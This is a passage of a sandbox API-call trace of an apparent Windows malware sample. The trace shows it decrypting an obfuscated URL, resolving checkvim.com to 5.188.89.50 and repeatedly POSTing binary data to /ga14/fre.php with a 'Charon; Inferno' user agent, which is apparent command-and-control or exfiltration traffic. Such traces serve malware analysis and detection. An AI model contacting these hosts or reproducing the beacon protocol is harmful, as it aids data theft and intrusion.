%i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0298.647] GetProcessHeap () returned 0x840000 [0298.647] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0298.647] GetProcessHeap () returned 0x840000 [0298.647] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0298.647] send (s=0x4cc, buf=0x873a58*, len=237, flags=0) returned 237 [0298.647] send (s=0x4cc, buf=0x87eb58*, len=159, flags=0) returned 159 [0298.648] GetProcessHeap () returned 0x840000 [0298.648] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0298.648] recv (in: s=0x4cc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0299.024] GetProcessHeap () returned 0x840000 [0299.024] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0299.025] GetProcessHeap () returned 0x840000 [0299.025] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0299.025] GetProcessHeap () returned 0x840000 [0299.025] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0299.025] GetProcessHeap () returned 0x840000 [0299.025] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0299.025] closesocket (s=0x4cc) returned 0 [0299.025] GetProcessHeap () returned 0x840000 [0299.025] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ba8 | out: hHeap=0x840000) returned 1 [0299.025] GetProcessHeap () returned 0x840000 [0299.025] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0299.026] GetProcessHeap () returned 0x840000 [0299.026] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0299.026] GetProcessHeap () returned 0x840000 [0299.026] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871290 | out: hHeap=0x840000) returned 1 [0299.026] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x560) returned 0x4cc [0299.028] Sleep (dwMilliseconds=0xea60) [0299.061] GetProcessHeap () returned 0x840000 [0299.061] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0299.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.062] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0299.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.068] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0299.134] GetProcessHeap () returned 0x840000 [0299.134] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0299.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.135] CryptImportKey (in: hProv=0x86fa40, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0299.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.135] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0299.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.139] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.139] GetProcessHeap () returned 0x840000 [0299.139] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0299.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.140] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0299.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.141] CryptDestroyKey (hKey=0x87e670) returned 1 [0299.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.141] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0299.141] GetProcessHeap () returned 0x840000 [0299.141] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0299.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.142] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.143] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.144] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.145] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.145] GetProcessHeap () returned 0x840000 [0299.145] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0299.145] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0299.145] GetProcessHeap () returned 0x840000 [0299.145] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0299.145] GetProcessHeap () returned 0x840000 [0299.145] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0299.145] GetProcessHeap () returned 0x840000 [0299.145] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0299.145] GetProcessHeap () returned 0x840000 [0299.145] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f950 [0299.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.146] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0299.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.154] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0299.159] GetProcessHeap () returned 0x840000 [0299.159] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0299.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.160] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0299.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.161] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0299.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.162] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.162] GetProcessHeap () returned 0x840000 [0299.162] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0299.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.163] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f950, pdwDataLen=0x19f9a4 | out: pbData=0x87f950, pdwDataLen=0x19f9a4) returned 1 [0299.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.164] CryptDestroyKey (hKey=0x87e630) returned 1 [0299.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.165] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0299.165] GetProcessHeap () returned 0x840000 [0299.165] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0299.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.166] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0299.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.167] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0299.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.168] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0299.168] GetProcessHeap () returned 0x840000 [0299.168] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0299.168] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0299.169] GetProcessHeap () returned 0x840000 [0299.169] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bd8 [0299.169] socket (af=2, type=1, protocol=6) returned 0x4d0 [0299.169] connect (s=0x4d0, name=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0299.237] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0299.237] GetProcessHeap () returned 0x840000 [0299.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0299.237] GetProcessHeap () returned 0x840000 [0299.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0299.239] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0299.241] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0299.241] GetProcessHeap () returned 0x840000 [0299.241] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0299.241] GetProcessHeap () returned 0x840000 [0299.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0299.241] GetProcessHeap () returned 0x840000 [0299.241] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcf8 [0299.241] GetProcessHeap () returned 0x840000 [0299.241] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0299.243] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0299.244] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0299.244] GetProcessHeap () returned 0x840000 [0299.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0299.244] GetProcessHeap () returned 0x840000 [0299.244] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0299.244] send (s=0x4d0, buf=0x873a58*, len=237, flags=0) returned 237 [0299.244] send (s=0x4d0, buf=0x87eb58*, len=159, flags=0) returned 159 [0299.244] GetProcessHeap () returned 0x840000 [0299.245] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0299.245] recv (in: s=0x4d0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0299.591] GetProcessHeap () returned 0x840000 [0299.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0299.591] GetProcessHeap () returned 0x840000 [0299.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0299.591] GetProcessHeap () returned 0x840000 [0299.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0299.591] GetProcessHeap () returned 0x840000 [0299.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0299.591] closesocket (s=0x4d0) returned 0 [0299.591] GetProcessHeap () returned 0x840000 [0299.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bd8 | out: hHeap=0x840000) returned 1 [0299.592] GetProcessHeap () returned 0x840000 [0299.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0299.592] GetProcessHeap () returned 0x840000 [0299.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0299.592] GetProcessHeap () returned 0x840000 [0299.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0299.592] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x12a8) returned 0x4d0 [0299.594] Sleep (dwMilliseconds=0xea60) [0299.608] GetProcessHeap () returned 0x840000 [0299.608] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0299.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.609] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0299.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.614] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0299.620] GetProcessHeap () returned 0x840000 [0299.620] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0299.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.621] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0299.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.622] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0299.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.623] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.623] GetProcessHeap () returned 0x840000 [0299.623] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0299.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.624] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0299.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.625] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0299.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.625] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0299.625] GetProcessHeap () returned 0x840000 [0299.625] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0299.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.626] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.627] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.628] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.628] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.629] GetProcessHeap () returned 0x840000 [0299.629] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0299.629] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0299.629] GetProcessHeap () returned 0x840000 [0299.629] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0299.629] GetProcessHeap () returned 0x840000 [0299.629] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0299.629] GetProcessHeap () returned 0x840000 [0299.629] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0299.629] GetProcessHeap () returned 0x840000 [0299.629] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd40 [0299.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.630] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0299.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.634] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0299.638] GetProcessHeap () returned 0x840000 [0299.638] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0299.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.639] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0299.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.640] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0299.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.641] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.641] GetProcessHeap () returned 0x840000 [0299.641] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0299.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.642] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd40, pdwDataLen=0x19f9a4 | out: pbData=0x87fd40, pdwDataLen=0x19f9a4) returned 1 [0299.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.643] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0299.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0299.643] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0299.643] GetProcessHeap () returned 0x840000 [0299.643] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0299.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.644] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0299.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.645] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0299.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.646] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0299.646] GetProcessHeap () returned 0x840000 [0299.646] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713d0 [0299.646] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0299.647] GetProcessHeap () returned 0x840000 [0299.647] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0299.647] socket (af=2, type=1, protocol=6) returned 0x4d4 [0299.647] connect (s=0x4d4, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0299.714] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0299.714] GetProcessHeap () returned 0x840000 [0299.714] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0299.714] GetProcessHeap () returned 0x840000 [0299.714] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0299.716] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0299.717] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0299.717] GetProcessHeap () returned 0x840000 [0299.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0299.717] GetProcessHeap () returned 0x840000 [0299.717] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0299.717] GetProcessHeap () returned 0x840000 [0299.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb90 [0299.717] GetProcessHeap () returned 0x840000 [0299.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0299.718] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0299.719] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0299.719] GetProcessHeap () returned 0x840000 [0299.719] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0299.719] GetProcessHeap () returned 0x840000 [0299.719] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0299.720] send (s=0x4d4, buf=0x873a58*, len=237, flags=0) returned 237 [0299.720] send (s=0x4d4, buf=0x87eb58*, len=159, flags=0) returned 159 [0299.720] GetProcessHeap () returned 0x840000 [0299.720] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0299.720] recv (in: s=0x4d4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0300.068] GetProcessHeap () returned 0x840000 [0300.068] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0300.068] GetProcessHeap () returned 0x840000 [0300.068] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0300.068] GetProcessHeap () returned 0x840000 [0300.068] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0300.068] GetProcessHeap () returned 0x840000 [0300.068] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0300.068] closesocket (s=0x4d4) returned 0 [0300.068] GetProcessHeap () returned 0x840000 [0300.068] HeapFree (in: 